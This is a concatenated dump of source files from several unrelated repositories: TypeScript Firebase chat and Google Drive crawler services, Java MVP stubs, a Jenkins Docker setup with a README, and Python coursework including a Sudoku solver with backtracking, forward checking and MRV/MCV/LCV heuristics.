export const tempLogin = async function (personalId, password, lineId) {
    const result = await memberService.getMemberByMobilePhone(password)
    if (result.empty) {
        // Same rejection reason (a plain string) as the original contract.
        throw "手機輸入錯誤!"
    }
    const data = result.docs[0].data()
    console.log(data)
    return data
}<file_sep>/src/services/chatMessageService.ts
import * as admin from 'firebase-admin';
import { ChatMessage, RecordDetail, Member, MessageTemplate } from '../model';
const chatMessageCollection = admin.firestore().collection("ChatMessage");
/** Allocate a fresh Firestore-generated id for a chat message document. */
export const getChatMessageUUID = (): string => {
    return chatMessageCollection.doc().id
}
/** Create or merge the chat-message document keyed by `chatMessage.id`. */
export const setChatMessage = (chatMessage: ChatMessage) => {
    return chatMessageCollection
        .doc(chatMessage.id)
        .set(chatMessage, { merge: true })
}
/** Allocate a fresh id inside the message's RecordDetail sub-collection. */
export const getRecordDetailUUID = (chatMessageId: string): string => {
    return chatMessageCollection.doc(chatMessageId).collection("RecordDetail").doc().id
}
/** Create or merge one RecordDetail under the given chat-message document. */
export const setRecordDetail = (messageRecordId: string, recordDetail: RecordDetail) => {
    return chatMessageCollection
        .doc(messageRecordId)
        .collection("RecordDetail")
        .doc(recordDetail.id)
        .set(recordDetail, { merge: true })
}
/** Fetch the full chat-message collection snapshot. */
export const getChatMessages = () => {
    return chatMessageCollection.get()
}
/** Fetch a single chat-message document snapshot by id. */
export const getChatMessageById = (chatMessageId: string) => {
    return chatMessageCollection.doc(chatMessageId).get()
}
/** Fetch every RecordDetail stored under one chat message. */
export const getRecordDetails = (chatMessageId: string) => {
    return chatMessageCollection
        .doc(chatMessageId)
        .collection("RecordDetail")
        .get()
}
/** Fetch one RecordDetail snapshot by its id under the given chat message. */
export const getRecordDetailById = (chatMessageId: string, recordDetailId: string) => {
    return chatMessageCollection.doc(chatMessageId)
        .collection("RecordDetail").doc(recordDetailId)
        .get()
}
/**
 * Persist a staff-to-member chat message: upsert the per-receiver ChatMessage
 * document (keyed by the receiver's channel id), then append a RecordDetail
 * with the message payload (newlines escaped as literal "\n").
 * NOTE(review): `staff` is currently unused; the receiver is stored as the
 * document's `sender` — confirm this field naming is intentional.
 */
export const createChatMessage = async (staff: Member, receiver: Member, channel: string, message: string, storageUrls: MessageTemplate["urls"], thumb: string) => {
    // let memberSnapShot = await memberService.getMemberByAnyId(receiver)
    // if (!memberSnapShot.empty) {
    let userMessage: ChatMessage = {
        id: receiver.id,
        sender: receiver
    }
    // The document id follows the delivery channel's native user id.
    if (channel == "Line") {
        userMessage.id = receiver.lineId
    } else if (channel == "WeChat") {
        userMessage.id = receiver.wechatId
    }
    await setChatMessage(userMessage)
    const trackId = getRecordDetailUUID(userMessage.id)
    const recordDetail: RecordDetail = {
        id: trackId,
        receiver: receiver,
        channel: channel as MessageTemplate['channel'],
        message: message.replace(/\n/g, "\\n"),
        urls: storageUrls || [],
        thumb: thumb || "",
        isSucceed: true,
        receiveTime: new Date().getTime(),
        read: true
    }
    return setRecordDetail(userMessage.id, recordDetail)
    // }
}<file_sep>/src/driveCrawler.ts
import { Router } from "express"
import * as config from './config';
import * as googleDrive from "./services/driveService"
var fs = require('fs');
const router = Router()
// POST /crawler — full sync of the configured root Drive folder:
// refresh the root folder record, recursively list all files (stamping them
// with `now`), then delete cached records whose stamp predates this run.
router.post('/crawler', async function (req, res) {
    console.log("crawler");
    const auth = await googleDrive.authorize();
    let t1, t2, t3;
    t1 = new Date();
    const now = +Date.now()
    // Seed the root folder metadata; far-future timestamps keep it from
    // being purged by the stale-file sweep below.
    await googleDrive.rename({
        "name": config.rootFolderName,
        "sid": 0,
        "fullName": config.rootFolderName,
        "parents": config.publicFolderId,
        "parentsName": [
            {
                "name": "Module",
                "fullName": "Module",
                "id": config.publicFolderId
            }
        ],
        "id": config.rootFolderId,
        "docId": config.rootFolderId,
        "mimeType": "application/vnd.google-apps.folder",
        modifiedDate: 9999999999999,
        modifiedTime: 9999999999999,
        createdTime: 9999999999999
    })
    let fileList = await googleDrive.listFiles(auth, config.rootFolderId, [{ fullName: config.rootFolderName, name: config.rootFolderName, id: config.rootFolderId }], now)
        .catch(err => {
            console.log("error:", err)
            res.status(403).send("list file failed")
        })
    // Purge records not touched in this crawl (batch size 200).
    await googleDrive.deleteFilesForSync(200, now, config.rootFolderId).catch(err => {
        console.log("error:", err)
        // res.status(403).send("delete file failed")
    })
    t2 = new Date();
    console.log("D1:", t2.getTime() - t1.getTime());
    res.status(200).send({ ok: "OK" })
});
// POST /anyCrawler — sync an arbitrary Drive folder given by the request body
// (rootFolderId/rootFolderName). When setNow is not "false", stale cached
// records are purged after the listing, as in /crawler.
router.post('/anyCrawler', async function (req, res) {
    console.log("anyCrawler");
    const rootFolderId = req.body.rootFolderId
    const rootFolderName = req.body.rootFolderName
    let setNow = true
    const auth = await googleDrive.authorize();
    // The flag arrives as a string; anything but "false" enables the purge.
    if (req.body.setNow == "false") {
        setNow = false
    } else {
        setNow = true
    }
    let t1, t2, t3;
    t1 = new Date();
    const now = +Date.now()
    let fileList = await googleDrive.listFiles(auth, rootFolderId, [{ fullName: rootFolderName, name: rootFolderName, id: rootFolderId }], now)
        .catch(err => {
            console.log("error:", err)
            res.status(403).send("list file failed")
        })
    if (setNow) {
        await googleDrive.deleteFilesForSync(200, now, rootFolderId).catch(err => {
            console.log("error:", err)
            // res.status(403).send("failed")
        })
    }
    t2 = new Date();
    console.log("D1:", t2.getTime() - t1.getTime());
    res.status(200).send({ ok: "OK" })
});
// POST /uploadFile — stage a base64-encoded upload into a local temp file,
// then push it to Google Drive under the requested path/name.
router.post('/uploadFile', async function (req, res) {
    console.log("uploadFile");
    const mimeType = req.headers["content-type"]
    const name = req.body.filename
    const path = req.body.path
    console.log("req.headers:", mimeType + " " + name + " " + path);
    const auth = await googleDrive.authorize();
    let t1, t2;
    t1 = new Date();
    const now = +Date.now()
    let base64String = req.body.file;
    // Strip a possible data-URI prefix, keeping only the raw base64 payload.
    let base64Image = base64String.split(';base64,').pop();
    // NOTE(review): the fixed temp filename `fileTemp` is shared across
    // requests, so concurrent uploads can clobber each other — confirm.
    fs.writeFile(`fileTemp`, base64Image, { encoding: 'base64' }, async function (err) {
        // BUG FIX: the error-first callback previously ignored `err`, so a
        // failed write still attempted the Drive upload with stale/missing data.
        if (err) {
            console.log("error:", err)
            return res.status(403).send("failed")
        }
        let fileList = await googleDrive.createFileWithFile(auth, name, path, mimeType, now)
            .catch(err => {
                console.log("error:", err)
                res.status(403).send("failed")
            })
        t2 = new Date();
        console.log("D1:", t2.getTime() - t1.getTime());
        res.status(200).send({ fileList })
    })
});
// POST /createFolder — create a Drive folder `name` under parent `parent`.
router.post('/createFolder', async function (req, res) {
    console.log("createFolder");
    const name = req.body.name
    const parent = req.body.parent
    console.log("name:", name);
    const auth = await googleDrive.authorize();
    let t1, t2, t3;
    t1 = new Date();
    const now = +Date.now()
    let fileList = await googleDrive.createFile(auth, name, parent, "folder", now)
        .catch(err => {
            console.log("error:", err)
            res.status(403).send("failed")
        })
    t2 = new Date();
    console.log("D1:", t2.getTime() - t1.getTime());
    res.status(200).send({ ok: "ok" })
});
// DELETE /deleteFile?fileId=... — delete a Drive file by id.
router.delete('/deleteFile', async function (req, res) {
    console.log("deleteFile");
    const fileId = req.query.fileId
    console.log("fileId:", fileId);
    const auth = await googleDrive.authorize();
    let t1, t2, t3;
    t1 = new Date();
    let fileList = await googleDrive.deleteFile(auth, fileId)
        .catch(err => {
            console.log("error:", err)
            res.status(403).send("failed")
        })
    t2 = new Date();
    console.log("D1:", t2.getTime() - t1.getTime());
    res.status(200).send({ fileList })
});
// PATCH /renameFile?fileId=... — rename a Drive file (new name in body).
router.patch('/renameFile', async function (req, res) {
    console.log("renameFile");
    const fileId = req.query.fileId
    const name = req.body.name
    console.log("fileId:", fileId);
    console.log("name:", name);
    const auth = await googleDrive.authorize();
    let t1, t2, t3;
    t1 = new Date();
    const now = +Date.now()
    let fileList = await googleDrive.renameFile(auth, fileId, name, now)
        .catch(err => {
            console.log("error:", err)
            res.status(403).send("failed")
        })
    t2 = new Date();
    console.log("D1:", t2.getTime() - t1.getTime());
    res.status(200).send({ fileList })
});
// PATCH /moveFile?fileId=... — move a Drive file into folderId (in body).
router.patch('/moveFile', async function (req, res) {
    console.log("moveFile");
    const fileId = req.query.fileId
    const folderId = req.body.folderId
    console.log("fileId:", fileId);
    console.log("folderId:", folderId);
    const auth = await googleDrive.authorize();
    let t1, t2, t3;
    t1 = new Date();
    const now = +Date.now()
    let fileList = await googleDrive.moveFile(auth, fileId, folderId, now)
        .catch(err => {
            console.log("error:", err)
            res.status(403).send("failed")
        })
    t2 = new Date();
    console.log("D1:", t2.getTime() - t1.getTime());
    res.status(200).send({ fileList })
});
export default router
| 2d4f604c0a14eb887e3402488fd0f7f9fc35d4f7 | [
"TypeScript"
] | 45 | TypeScript | jkes900136/messagingSystem | 86b1d4398ad9c87d0dbe467f07557801c75ae901 | 02ceaea7515de4ef90243f5426f0be41fbfa6316 |
refs/heads/master | <file_sep>package com.fanyafeng.wechat.home.contacts;
import android.content.Context;
import com.fanyafeng.wechat.home.main.MainContract;
/**
* Author: fanyafeng
* Data: 17/2/20 上午11:56
* Email: <EMAIL>
*/
/**
 * MVP presenter for the contacts screen. The constructor wires itself to the
 * view via {@code setPresenter(this)} so the view can call back into it.
 */
public class ContactsPresenter implements ContactsContract.Presenter {
    private Context context;
    private ContactsContract.View contactsView;
    public ContactsPresenter(Context context, ContactsContract.View contactsView) {
        this.context = context;
        this.contactsView = contactsView;
        contactsView.setPresenter(this);
    }
    @Override
    public void start() {
        // No initialization work yet.
    }
}
<file_sep>package com.fanyafeng.wechat;
/**
* Author: fanyafeng
* Data: 17/2/20 上午11:19
* Email: <EMAIL>
*/
/** Base contract for all MVP presenters; {@link #start()} begins presenter work. */
public interface BasePresenter {
    void start();
}
<file_sep>package com.fanyafeng.wechat;
/**
* Author: fanyafeng
* Data: 17/2/20 上午11:18
* Email: <EMAIL>
*/
/** Base contract for all MVP views; the presenter of type {@code T} is injected here. */
public interface BaseView<T> {
    void setPresenter(T presenter);
}
<file_sep>package com.fanyafeng.wechat.home.find;
import android.content.Context;
/**
* Author: fanyafeng
* Data: 17/2/20 上午11:56
* Email: <EMAIL>
*/
/**
 * MVP presenter for the "find/discover" screen. The constructor wires itself
 * to the view via {@code setPresenter(this)}.
 */
public class FindPresenter implements FindContract.Presenter{
    private Context context;
    private FindContract.View findView;
    public FindPresenter(Context context, FindContract.View findView) {
        this.context = context;
        this.findView = findView;
        findView.setPresenter(this);
    }
    @Override
    public void start() {
        // No initialization work yet.
    }
}
| 2113dc1434a389122e438a3c29172ed92f3ddd78 | [
"Java"
] | 4 | Java | 1181631922/WeChat | 0a67bb40b11384d7a65cb0c7747dbcbc17ee28db | 77f2296a4e40ec2b4a1dcfa01d0a0241a234b337 |
refs/heads/master | <repo_name>toschneck/containerized-jenkins<file_sep>/docker-compose.yml
version: "2"
services:
jenkinsmaster:
image: jenkins:2.7.4
ports:
- 80:8080
volumes:
      # mount the jenkins configuration folder
- ./jenkins_conf:/var/jenkins_home
# mount the host system time to the container
- /etc/localtime:/etc/localtime:ro
links:
- jenkinsslave
environment:
# set correct timezone
- TZ=Europe/Berlin
### use e.g.`docker-compose scale jenkinsslave=4`
jenkinsslave:
build: jenkins_slave
environment:
# set correct timezone
- TZ=Europe/Berlin
# TODO: change this password there and http://localhost/user/node/configure
- JENKINS_JNLP_PW=<PASSWORD>
- JENKINS_SLAVE_ADD_ARG=-executors 1
volumes:
- maven-data:/home/jenkins/.m2
# mount the host system time to the container
- /etc/localtime:/etc/localtime:ro
volumes:
maven-data:
driver: local<file_sep>/update_envrionment.sh
#!/bin/bash
# script to update the whole environment
# !!! requires: running ssh-agent !!!
# Flow: commit local config changes -> pull repo + images -> rebuild ->
#       restart all containers -> push the commit back to the remote.
echo "--> add all modified files to git and commit"
git add --all
git commit -m "add configration change automatically from $(date +%Y-%m-%d:%H:%M:%S)"
echo "--> pull all changes from repo and docker images"
git pull
docker-compose pull
echo "--> rebuild all containers"
# The && chain ensures containers are only stopped/restarted when the
# preceding step succeeded (i.e. a failed build leaves the stack running).
docker-compose build && \
echo "--> stop and remove all running containers" && \
docker-compose scale jenkinsmaster=0 jenkinsslave=0 && \
docker-compose down && \
echo "--> start the new containers" && \
docker-compose up -d && \
docker-compose scale jenkinsslave=4
echo "--> push the changes to the git repo"
git push --all
<file_sep>/README.md
# Notes for building up a docker-based Jenkins environment

## Build / Start / Shutdown
### automatic environment deployment
./update_envrionment.sh
The automatic environment deploy script will do the following steps:
1) adds all modified files to git and commits it
2) pulls all changes from repo
3) rebuild all containers
4) stop and remove all running containers
5) start the new containers
6) push the changes to the git repo
### manual environment deployment
build and start the jenkinse master and slave container
docker-compose build
docker-compose up
e.g. scale our amount on slave to `4`:
docker-compose scale jenkinsslave=4
(use for updates) shutdown and remove all started jenkins containers
docker-compose down
# Server / Nodes
* Jenkins Build Server: [localhost](http://localhost)
* The admin user have the following credentials: `admin` / `admin`
## git clone
Use as template the following github repo:
git clone <EMAIL>:toschneck/containerized-jenkins.git
# Docker Images
You will find the ready to use image for the Jenkins slave on Docerhub:
* **[toschneck/jenkins-slave-jnlp](https://hub.docker.com/r/toschneck/jenkins-slave-jnlp/)**
# Clean up temporary data
__(optional)__ remove all _temporary data_ as logs and so on
./rm_temp_conf_files.sh
## FOR PRODUCTION
__ATTENTION: make sure to change the default node password keys under:__
* http://localhost/user/node/configure
* and in your `docker-compose.yml`
```
environment:
- JENKINS_JNLP_PW=<PASSWORD>
```
| cb001e8691bc02915c64ed083f14706c22dd3aed | [
"Markdown",
"YAML",
"Shell"
] | 3 | YAML | toschneck/containerized-jenkins | 0eb45b6e871455711a69bf04516fa3c48b3d291f | 4ac226f11a3b43719dda036c8c8f76ee53a28b10 |
refs/heads/master | <file_sep>var keystone = require('keystone');
var async = require('async');
exports = module.exports = function (req, res) {
var view = new keystone.View(req, res);
var locals = res.locals;
// Init locals
locals.section = 'library';
locals.filters = {
detachment: req.params.detachment,
};
locals.data = {
costumes: [],
detachments: [],
};
// Load all detachments
view.on('init', function (next) {
keystone.list('Detachment').model.find().sort('name').exec(function (err, results) {
if (err || !results.length) {
return next(err);
}
locals.data.detachments = results;
// Load the counts for each detachment
async.each(locals.data.detachments, function (detachment, next) {
keystone.list('Costume').model.count().where('detachments').in([detachment.id]).exec(function (err, count) {
detachment.costumeCount = count;
next(err);
});
}, function (err) {
next(err);
});
});
});
// Load the current detachment filter
view.on('init', function (next) {
if (req.params.detachment) {
keystone.list('Detachment').model.findOne({ key: locals.filters.detachment }).exec(function (err, result) {
locals.data.detachment = result;
next(err);
});
} else {
next();
}
});
// Load the costumes
view.on('init', function (next) {
var q = keystone.list('Costume').paginate({
page: req.query.page || 1,
perPage: 10,
maxPages: 10,
})
.populate(' detachments');
if (locals.data.detachment) {
q.where('detachments').in([locals.data.detachment]);
}
q.exec(function (err, results) {
locals.data.costumes = results;
next(err);
});
});
// Render the view
view.render('library');
};
| be0f3564ab09590ea30013260a44d9c0ca5a5ba3 | [
"JavaScript"
] | 1 | JavaScript | LazyAardvark/Costume-Reference-Library | d52551883bceadb1a6a521dfc5499f63d93f34c0 | 8cd27dc110e33d496a0c063aa4806b8858db404c |
refs/heads/master | <repo_name>hannah-rose/348_Projects<file_sep>/Assignment2/test.py
# -*- coding: utf-8 -*-
"""
Manual driver: plays one Mancala game between the custom AI player
(pbh423) and a human player on the console.

Created on Sun Apr 19 21:08:18 2015
@author: Peter
"""
from MancalaBoard import *
# Player 1 is the custom AI; Player 2 takes its moves from stdin.
p1 = pbh423(1,Player.CUSTOM)
p2 = Player(2, Player.HUMAN)
mb = MancalaBoard()
# Runs the interactive game loop until the game finishes.
mb.hostGame(p1, p2)
# Sudoku Solver
# Author(s) names AND netid's:
# <NAME> hra069
# <NAME> kmg381
# <NAME> pbh423
# Date: 2nd May, 2015
import struct, string, math, time
from copy import *
class SudokuBoard:
    """This will be the sudoku board game object your player will manipulate."""
    # Class-level defaults; __init__ shadows count with an instance attribute.
    count=0
    verbose=0
    def __init__(self, size, board, domain):
        """the constructor for the SudokuBoard"""
        self.BoardSize = size #the size of the board
        self.CurrentGameBoard= board #the current state of the game board
        self.Domain = domain #the set of possible values for each cell
        self.count=0 #number of candidate assignments attempted by the solver
        self.LCV_count=0 #removals performed by forwardcheck (read by getLCV)
        self.startTime=0.0 #set by solve(); used for the 10-minute timeout
    def set_value(self, row, col, value):
        """This function will create a new sudoku board object with the input
        value placed on the GameBoard row and col are both zero-indexed"""
        #add the value to the appropriate position on the board
        #NOTE(review): the board list is mutated in place, so the "new"
        #SudokuBoard returned below shares its state with self -- confirm
        #callers rely only on the mutation, not on a fresh copy.
        self.CurrentGameBoard[row][col]=value
        #return a new board of the same size with the value added
        return SudokuBoard(self.BoardSize, self.CurrentGameBoard, self.Domain)
    def print_board(self):
        """Prints the current game board. Leaves unassigned spots blank."""
        div = int(math.sqrt(self.BoardSize)) #subsquare edge length
        dash = ""
        space = ""
        line = "+"
        sep = "|"
        #build one horizontal separator (line) and one spacer row (sep)
        for i in range(div):
            dash += "----"
            space += "    "
        for i in range(div):
            line += dash + "+"
            sep += space + "|"
        #NOTE(review): the i == -1 iteration below also walks row index -1
        #(Python's last row) before printing the top border -- confirm this
        #output is intended.
        for i in range(-1, self.BoardSize):
            if i != -1:
                print "|",
            for j in range(self.BoardSize):
                if self.CurrentGameBoard[i][j] > 9:
                    print self.CurrentGameBoard[i][j],
                elif self.CurrentGameBoard[i][j] > 0:
                    print "", self.CurrentGameBoard[i][j],
                else:
                    print "  ",
                if (j+1 != self.BoardSize):
                    if ((j+1)//div != j/div):
                        print "|",
                    else:
                        print "",
                else:
                    print "|"
            if ((i+1)//div != i/div):
                print line
            else:
                print sep
def parse_file(filename):
    """Parses a sudoku text file into a BoardSize, and a 2d array which holds
    the value of each cell. Array elements holding a 0 are considered to be
    empty.

    File format: first line is the board size, second line the number of
    pre-filled cells, then one "row col value" triple per line (1-indexed).
    """
    # "with" guarantees the handle is closed even on a malformed file
    # (the original left the file open).
    with open(filename, 'r') as f:
        BoardSize = int(f.readline())
        NumVals = int(f.readline())
        # initialize a blank board
        board = [[0 for i in range(BoardSize)] for j in range(BoardSize)]
        # populate the board with initial values
        for i in range(NumVals):
            chars = f.readline().split()
            row = int(chars[0])
            col = int(chars[1])
            val = int(chars[2])
            board[row - 1][col - 1] = val
    return board
def is_complete(sudoku_board):
    """Return True iff the board is fully filled and no value repeats in any
    row, column, or subsquare."""
    grid = sudoku_board.CurrentGameBoard
    size = len(grid)
    box = int(math.sqrt(size))
    for r in range(size):
        for c in range(size):
            val = grid[r][c]
            if val == 0:
                return False
            # any other cell in the same row or column with the same value?
            for k in range(size):
                if k != c and grid[r][k] == val:
                    return False
                if k != r and grid[k][c] == val:
                    return False
            # any duplicate inside the enclosing subsquare?
            base_r = (r // box) * box
            base_c = (c // box) * box
            for dr in range(box):
                for dc in range(box):
                    rr = base_r + dr
                    cc = base_c + dc
                    if (rr != r or cc != c) and grid[rr][cc] == val:
                        return False
    return True
def init_board(file_name):
    """Build a SudokuBoard from the puzzle description in file_name."""
    grid = parse_file(file_name)
    size = len(grid)
    return SudokuBoard(size, grid, create_domain(grid, size))
def create_domain(board, size):
    """Return a size x size grid where every cell holds a fresh candidate
    list [1, ..., size].  Called from init_board; `board` is unused here but
    kept for interface compatibility."""
    return [[list(range(1, size + 1)) for _ in range(size)]
            for _ in range(size)]
def init_domain(board, size):
    """Prune board.Domain to reflect the puzzle's pre-assigned values.

    Each filled cell's domain collapses to its single value, and that value
    is forward-checked out of every peer's domain.  Must run after
    init_board.  Mutates and returns board.Domain.
    """
    domain = board.Domain
    grid = board.CurrentGameBoard
    for r in range(size):
        for c in range(size):
            value = grid[r][c]
            if value != 0:
                domain[r][c] = [value]
                forwardcheck(board, domain, r, c)
    return domain
def solve(initial_board, forward_checking = False, MRV = False, MCV = False,
          LCV = False):
    """Solve the puzzle in place with backtracking search.

    forward_checking enables constraint propagation; MRV/MCV/LCV select the
    variable- and value-ordering heuristics (only honoured when forward
    checking is on).  Returns the (mutated) board.
    """
    # Prune the initial domains, then start the clock for the timeout.
    init_domain(initial_board, initial_board.BoardSize)
    initial_board.startTime = time.time()
    if not forward_checking:
        backtrack(initial_board)
    else:
        back_forward(initial_board, initial_board.Domain, MRV, MCV, LCV)
    return initial_board
def backtrack(board):
"""Recursive implementation to solve a Sudoku board. Uses brute force to
check all possible solutions. If it cannot find one, it backtracks and undos
one of its guesses and continues."""
arr=getNextOpen(board)
row=arr[0]
col=arr[1]
if (row==-1):
#no Open Spots were found. All spots are filled so we are done
return True
if (board.startTime+600<time.time()):
print "TIME OUT"
return True
BoardArray = board.CurrentGameBoard
size = len(BoardArray)
#we will check if any of these values work
for test in range (1, size+1):
board.count+=1
#check if this test is a valid move.
if(noConflictCheck(board,test,row,col)):
#Set new value
board.set_value(row,col,test)
#if we are done, pass the true back through the recursion
if (backtrack(board)):
return True
#else undo the move and keep trying
board.set_value(row,col,0)
#if nothing else is found go back and change the most recent value
return False
def back_forward(board, domain,MRV,MCV,LCV):
    """Recursive implementation to solve a Sudoku board. Implements
    forward checking into backtracking algorithm.

    `domain` is this search node's candidate grid; each recursive call gets
    its own deep copy so backtracking restores the parent's domains."""
    # Pick the next variable with the requested heuristic (MRV wins over MCV).
    if (MRV==True):
        arr=getMRV(board)
    elif (MCV==True):
        arr=getMCV(board)
    else:
        arr=getNextOpen(board)
    row=arr[0]
    col=arr[1]
    if (time.time()>board.startTime+600):
        print "TIME OUT"
        return True
    #print col,row
    if (row==-1):
        #no Open Spots were found. All spots are filled so we are done
        return True
    BoardArray = board.CurrentGameBoard
    #If LCV, sort domain of variable
    if (LCV==True):
        domain_test = deepcopy(domain)
        dom = getLCV(board,domain_test,row,col)
    else:
        dom=domain[row][col]
    #Check each value in domain
    for test in dom:
        board.count+=1
        #check if this test is a valid move.
        if(noConflictCheck(board,test,row,col)):
            #Set new value
            domain_test = deepcopy(domain)
            board.set_value(row,col,test)
            #Assess its domain and check for empty domains
            if forwardcheck(board, domain_test, row, col):
                if back_forward(board, domain_test,MRV,MCV,LCV):
                    return True
            #else undo the move and keep trying
            board.set_value(row,col,0)
            # NOTE(review): this rebinds the local `domain` to board.Domain,
            # so later iterations deepcopy the board's global domain instead
            # of this node's domain -- looks unintended; confirm.
            domain = board.Domain
    #if nothing else is found go back and change the most recent value
    return False
def forwardcheck(board, domain, row, col):
    """Propagate the assignment at (row, col) through `domain`.

    Removes the just-assigned value from the candidate list of every peer
    (same row, column, or subsquare), counting each removal in
    board.LCV_count.  Returns False when some cell's domain becomes empty
    (dead branch), True otherwise.

    Bug fix: the original tested `domain.count([])`, which looks for an
    empty *row* of the domain grid (impossible, rows are lists of lists),
    so empty cell domains were never detected and forward checking never
    pruned.  We now scan individual cell domains.
    """
    BoardArray = board.CurrentGameBoard
    val = BoardArray[row][col]
    size = len(BoardArray)
    subsquare = int(math.sqrt(size))
    # Row and column peers.
    for i in range(size):
        if i != col and val in domain[row][i]:
            domain[row][i].remove(val)
            board.LCV_count += 1
        if i != row and val in domain[i][col]:
            domain[i][col].remove(val)
            board.LCV_count += 1
    # Subsquare peers (cells sharing the row/column were already handled).
    base_r = (row // subsquare) * subsquare
    base_c = (col // subsquare) * subsquare
    for i in range(subsquare):
        for j in range(subsquare):
            r = base_r + i
            c = base_c + j
            if (r != row or c != col) and val in domain[r][c]:
                domain[r][c].remove(val)
                board.LCV_count += 1
    # Dead branch if any *cell* domain has been emptied.
    for dom_row in domain:
        for cell in dom_row:
            if not cell:
                return False
    return True
def getLCV(board, domain, row, col):
    """Finds the least constrained value, leaving the largest number of options
    in the domain of other empty squares. Returns the domain of a variable, sorted
    so that the LCV will be tried first (fewest forced removals first)."""
    #Get list of possible values
    # Work on copies so the real board/domain are not disturbed.
    board_test = deepcopy(board)
    domain_test = deepcopy(domain)
    dom = domain_test[row][col]
    #turn the domain into an empty dictionary
    dom_dict = {x: 0 for x in dom}
    #Attach number of changes to each possible value
    for val in dom_dict:
        #set test value and forward check it
        board_test.CurrentGameBoard[row][col] = val
        board_test.LCV_count = 0
        forwardcheck(board_test,domain_test,row,col)
        #Add LCV_count to dictionary
        dom_dict[val]=board_test.LCV_count
        #reset domain to try again for next test
        # NOTE(review): this rebinds to the caller's `domain` rather than
        # taking a fresh copy, so from the second iteration on forwardcheck
        # mutates the caller's domain -- TODO confirm intended.
        domain_test = domain
    #sort dictionary by LCV_counts and return the sorted domain
    dom_sort = sorted(dom_dict, key=dom_dict.__getitem__)
    return dom_sort
def getNextOpen(board):
    """Locate the first empty cell (value 0), scanning row-major.

    Returns [row, col], or [-1, -1] when no cell is empty, i.e. the
    puzzle is fully assigned.
    """
    size = board.BoardSize
    for r in range(size):
        row_vals = board.CurrentGameBoard[r]
        for c in range(size):
            if row_vals[c] == 0:
                return [r, c]
    return [-1, -1]
def getMRV(board):
    """Minimum Remaining Values heuristic.

    Returns [row, col] of the empty cell with the smallest candidate
    domain, or [-1, -1] when no cell is empty.  Ties keep the first cell
    found in row-major order.
    """
    best = [-1, -1]
    best_size = 999   # sentinel larger than any real domain
    for r in range(board.BoardSize):
        for c in range(board.BoardSize):
            if board.CurrentGameBoard[r][c] == 0:
                cur = len(board.Domain[r][c])
                if cur < best_size:
                    best_size = cur
                    best = [r, c]
    return best
def getMCV(board):
    """Most Constrained Variable: Chooses the variable that is involved in the
    largest number of constraints with other unassigned variables.

    Returns [row, col] of the chosen empty cell, or [-1, -1] if none."""
    maxConstraints = -1
    minRow=-1
    minCol=-1
    mcv_count = 0
    size = len(board.CurrentGameBoard)
    subsquare = int(math.sqrt(size))
    #board.print_board()
    ##test = [ [ 0 for i in range(size) ] for j in range(size) ]
    for row in range(0,board.BoardSize):
        for col in range(0,board.BoardSize):
            mcv_count = 0
            if (board.CurrentGameBoard[row][col] == 0):
                #Check rows and columns for conflicts
                # NOTE(review): the `i//subsquare!=subsquare` and
                # `i//size!=subsquare` guards are always true for
                # i < size -- they look like dead leftovers; confirm.
                for i in range(board.BoardSize):
                    if ((board.CurrentGameBoard[row][i]==0) and i != col and i//subsquare!=subsquare):
                        mcv_count += 1
                    if ((board.CurrentGameBoard[i][col]==0) and i != row and i//size!=subsquare):
                        mcv_count += 1
                #determine which square the cell is in and find conflicts
                SquareRow = row // subsquare
                SquareCol = col // subsquare
                for i in range(subsquare):
                    for j in range(subsquare):
                        if((board.CurrentGameBoard[SquareRow*subsquare+i][SquareCol*subsquare+j])==0
                           and (SquareRow*subsquare + i != row)
                           and (SquareCol*subsquare + j != col)):
                            mcv_count += 1
                # Keep the empty cell touching the most unassigned peers.
                if maxConstraints < mcv_count:
                    maxConstraints = mcv_count
                    minRow = row
                    minCol = col
                #test[row][col]=mcv_count
    #print test
    return [minRow,minCol]
def noConflictCheck(board, num, row, col):
    """Trimmed-down is_complete: return True when placing `num` at
    (row, col) clashes with no other cell in the same row, column, or
    subsquare."""
    grid = board.CurrentGameBoard
    size = len(grid)
    box = int(math.sqrt(size))
    # Row and column scan.
    for k in range(size):
        if k != col and grid[row][k] == num:
            return False
        if k != row and grid[k][col] == num:
            return False
    # Subsquare scan (same exclusion rule as is_complete).
    base_r = (row // box) * box
    base_c = (col // box) * box
    for i in range(box):
        for j in range(box):
            r = base_r + i
            c = base_c + j
            if (r != row and c != col) and grid[r][c] == num:
                return False
    return True
# -*- coding: utf-8 -*-
"""
Driver: runs 10-fold cross-validation of the Naive Bayes sentiment
classifier over the movie-review corpus.

Created on Tue May 12 16:04:49 2015
@author: peter
"""
from hra069_kmg381_pbh423 import *
# Argument 0: reuse the pickled dictionaries if present (1 forces retraining).
b=Bayes_Classifier(0)
# validate() retrains per fold and prints precision/recall/accuracy/f-measure.
b.validate()
<file_sep>/Assignment3/test.py
# -*- coding: utf-8 -*-
"""
Manual smoke test: loads one easy 9x9 puzzle, prints it, solves it with
forward checking + MCV, then reports completion and the assignment count.

Created on Mon Apr 27 12:13:10 2015
@author: peter
"""
from hra069_kmg381_pbh423 import *
verbose=0
b=init_board("input_puzzles/easy/9_9.sudoku")
#b=init_board("input_puzzles/more/more/16x16/16x16.3.sudoku")
b.print_board()
#test=getNextOpen(b)
#backtrack(b)
# solve(board, forward_checking, MRV, MCV, LCV)
solved_board = solve(b,True,False,True,False)
#b.print_board()
solved_board.print_board()
print is_complete(solved_board)
print solved_board.count
# -*- coding: utf-8 -*-
"""
Driver for the stroke-labelling HMM: trains on the files in
../trainingFiles/, relabels the same files, and prints the confusion
matrix (training-set evaluation).

Created on Thu Jun 04 22:26:09 2015
@author: Peter
"""
execfile("StrokeHmm.py")
sl = StrokeLabeler()
# Earlier experiment: average feature values per class (kept for reference).
#text,draw=sl.featureBatch("../trainingFiles/")
#print "Text Avg: "+str(sum(text)/len(text))
#print "Draw Avg: "+str(sum(draw)/len(draw))
#"""
sl.trainHMMDir("../trainingFiles/")
labels,myLabels=sl.testBatch("../trainingFiles/")
print len(labels)
print len(myLabels)
returns=sl.confusion(labels,myLabels)
print returns
#"""
# -*- coding: utf-8 -*-
"""
Benchmark driver: solves one puzzle with every combination of the solver's
heuristics, printing whether each run completed plus its consistency-check
count for comparison.

Created on Saturday, May 2, 2015
@author: Hannah
"""
from hra069_kmg381_pbh423 import *
# Puzzle used for every configuration below; a fresh board is built per run.
s="input_puzzles/easy/16_16.sudoku"
print"Backcheck Only"
b4=init_board(s)
solved_board = solve(b4,False,False,False,False)
print is_complete(solved_board)
print solved_board.count,"\n"
print "Forwardcheck Only"
b4=init_board(s)
solved_board = solve(b4,True,False,False,False)
print is_complete(solved_board)
